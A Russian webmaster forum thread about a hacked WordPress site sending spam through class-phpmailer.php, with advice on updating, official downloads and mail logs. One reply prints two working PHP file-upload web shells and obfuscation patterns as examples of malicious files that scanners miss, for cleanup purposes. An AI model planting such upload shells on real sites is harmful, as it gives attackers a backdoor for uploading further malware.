Хостер гонит: спам с сайта шлют. Спасайте!

123
sergv
На сайте с 13.04.2006
Offline
436
#11

100%. 4.0 - это пипец какая древняя версия, а не последняя :)

https://REGHOME.ru - регистрация и продление доменов от 169₽ в российских и международных зонах по честным ценам без звездочек. (R01, WebNames, UK2). Принимаем Ю-Money, Visa, MasterCard, Мир
S
На сайте с 17.12.2008
Offline
295
#12
l1mon:
Не спец в вп, но по моему вы используете левую старую версию от левого старого сайта.

Официальный русский сайт - https://ru.wordpress.org/ и официальная версия 4.7.3

Да, верное, не углядел как-то.

Поставил плагин restore wordpress update, обновился до 4.7.3, поудалял неиспользуемые плагины, прогнал айболитом.

Жалобы были в целом на файл class-phpmailer.php - при обновлении вордпресса айболит на него не ругается.

Шелла так и не сыскал. Все пообновлял, подчистил, ну не знаю, заканчивать на этом или нет, хостер вырубил возможность отправлять письма.

Чего еще можно предпринять?

15 жирных вечных ссылок с трастовых сайтов с высоким ТИЦ ( https://goo.gl/zd62Qa ) Найдем и устраним SEO-ошибки Вашего сайта, которые мешают продвижению ( https://goo.gl/gHsx1U ) Высококачественный рерайтинг: 50 р. / 1000 знаков ( https://goo.gl/5xDmhE )
sergv
На сайте с 13.04.2006
Offline
436
#13
strefapl:
хостер вырубил возможность отправлять письма.

Если Вас это устраивает + сайты обновлены, ничего подозрительного не находите - вопрос можно считать закрытым.

S
На сайте с 17.12.2008
Offline
295
#14

Добавлю, что сверху на обновленный ВП закинул файл class-phpmailer.php из этой темы https://ru.wordpress.org/support/topic/уязвимость-php-mailer/page/2/

Может, и не надо было, но в нем версия этого самого майлера выше чем в обновленном вордпрессе, не знаю почему )

sergv
На сайте с 13.04.2006
Offline
436
#15

Да ну...

Там версия 5.2.21, в WP 4.7.3 версия уже 5.2.22

Файл версии 5.2.22 у меня на хосте датируется аж 20 января 17 года.

globalmoney
На сайте с 09.12.2005
Offline
398
#16

strefapl, новая версия всегда только на сайте разработчика, а не на стороннем сайте!!!

Качая со стороннего сайта, будьте готовы к шелам и т.п.!

MGNHost.ru - полный комплекс хостинг услуг ( https://www.mgnhost.ru ) VPS/VDS на SSD дисках в России / Нидерландах / США от 250 рублей ( https://www.mgnhost.ru/vds.php )
S
На сайте с 17.12.2008
Offline
295
#17

Ок, все понял. Хостеру отписал - а тот шутник, врубил снова возможность отправки писем, мол, такая функция входит в услугу, и с вас санкции сняты. Еще раз попросил отключить - еще раз ответил, мол, санкции сняты. При этом грозит, если еще раз будут слать спам, то вырубит акк :) Таймвеб )

Но в целом, службой поддержки доволен - оперативные ребята, помогли.

S
На сайте с 30.09.2016
Offline
469
#18

А может быть, и не было никакого шелла. И уязвимость, может быть, здесь ни при чём. Может быть, у Вас работает функция ответа на мэйл, который спамер забивает в форму обратной связи как якобы свой. Типа "прислать копию на этот адрес". И шлёте автоматом копии на все адреса. Проверьте этот вариант.

Отпилю лишнее, прикручу нужное, выправлю кривое. Вытравлю вредителей.
S
На сайте с 17.12.2008
Offline
295
#19
Sitealert:
А может быть, и не было никакого шелла. И уязвимость, может быть, здесь ни при чём. Может быть, у Вас работает функция ответа на мэйл, который спамер забивает в форму обратной связи как якобы свой. Типа "прислать копию на этот адрес". И шлёте автоматом копии на все адреса. Проверьте этот вариант.

Да нет.

Мне телегу прислали вот такую, там более 1000 мейлов отправлено за пару часов:

Mar 6 13:49:20 bestia splogger[16911]: 1ckqCc-0004Oh-NJ Completed
Mar 6 13:49:27 bestia splogger[18902]: 1ckqCl-0004us-56 X-PHP-Originating-Script: "8917:class-phpmailer.php"
Mar 6 13:49:27 bestia splogger[18902]: 1ckqCl-0004us-56 <= mylogin@bestia.timeweb.ru U=mylogin P=local S=2787 id=d01f9ae14de6c4763e5bf596ef1a6272@mysite.ru
Mar 6 13:49:27 bestia splogger[18909]: 1ckqCl-0004uz-5g X-PHP-Originating-Script: "8917:class-phpmailer.php"
Mar 6 13:49:27 bestia splogger[18909]: 1ckqCl-0004uz-5g <= mylogin@bestia.timeweb.ru U=mylogin P=local S=2796 id=e18ac46cf780c2326338b21eeef28a25@mysite.ru
Mar 6 13:49:27 bestia splogger[18919]: 1ckqCl-0004v9-6D X-PHP-Originating-Script: "8917:class-phpmailer.php"
Mar 6 13:49:27 bestia splogger[18919]: 1ckqCl-0004v9-6D <= mylogin@bestia.timeweb.ru U=mylogin P=local S=2784 id=45e2d21347e4df8988132c087b9dda74@mysite.ru
Mar 6 13:49:27 bestia splogger[18926]: 1ckqCl-0004vG-6o X-PHP-Originating-Script: "8917:class-phpmailer.php"
Mar 6 13:49:27 bestia splogger[18926]: 1ckqCl-0004vG-6o <= mylogin@bestia.timeweb.ru U=mylogin P=local S=2793 id=983fe3344d50671c4348a8862240d213@mysite.ru
Mar 6 13:49:27 bestia splogger[18915]: 1ckqCl-0004uz-5g => wart-195@yandex.ru R=dnslookup T=remote_smtp H=mx.yandex.ru [2a02:6b8::89] X=TLS1.2:RSA_AES_128_CBC_SHA256:128 C="250 2.0.0 Ok: queued on mxfront12h.mail.yandex.net as 1488797367-92CxlZFbAg-nRIa6FJW"
Mar 6 13:49:27 bestia splogger[18915]: 1ckqCl-0004uz-5g Completed
Maxiz
На сайте с 04.01.2008
Offline
208
#20
strefapl:
Да, это виртуальный хостинг.
Выкачал все сайты на комп, засканил айболитом, то, что он понаходил, подправил. Но ничего похожего на вирусы. Вообще как шелл должен выглядеть? Это же какой-то левый файл, или это приписка в стандартный файл?
Чем еще можно засканить после айболита?

К сожалению, айболит находит не все файлы, которые залиты на сайт, лежать втихаря в какой нибудь папочки и используются злоумышленниками например для заливки новых вредоносных скриптов, например Айболит никак не отмечает обычный PHP скрипт для аплоада (загрузки на сервер) любых файлов. Например у тебя с большой вероятностью ещё остались "левые" файлы, в которых содержится следующий код:

<?php
if ($mode=='upload') {
if(is_uploaded_file($_FILES["filename"]["tmp_name"]))
{
move_uploaded_file($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);
echo $_FILES["filename"]["name"];
}
}
?>

или

<?php
print '<h1>#p@$c@#</h1>';
echo "D00D: "; /*_*/
echo $_SERVER['REMOTE_ADDR'];
echo "<form method=\"post\" enctype=\"multipart/form-data\">\n";
echo "<input type=\"submit\" value=\"LOAD\"><br>\n";
echo "<input type=\"file\" name=\"filename\"><br> \n";
echo "</form>\n";

if ( @is_uploaded_file( $_FILES["filename"]["tmp_name"] ))
{

move_uploaded_file($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);

$file = $_FILES["filename"]["name"];
echo "<a href=\"$file\">$file</a>";

}
else
{
/*_*/
echo("empty");
/*_*/
}

$var1 = $_SERVER['SCRIPT_FILENAME'];
/*_*/
touch( $var1 );
?>

К сожалению, айболит не помечает такие файлы или код как подозрительные. Ну во-первых, потому, что такие куски кода присутствуют во многих стандартных файлах любой CMS.

В общем сейчас тебе надо вручную полазить по папкам сайт ,поискать файлы которые не относятся к твоей CMS. Я лечил много сайтов и часто вредоносный код содержистя в файлах с именами: mail.php, ini.php, backup.php, license.php, gallery.phpб config.php... в общем вручную посмотри

они обычно содержат подобные куски кода:

...["\x67\x6fg\x63\x7a\x68\x62\x6dq"]...

или

...chr(101).chr(99).chr(111).chr(100)....

Так же проверь файл .htaccess на наличие левых директив

P.S. Как то тут форум изменяет PHP код непонятно, звёздочки в коде и цифры 91, 93 выше сам форум тут добавил

123

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий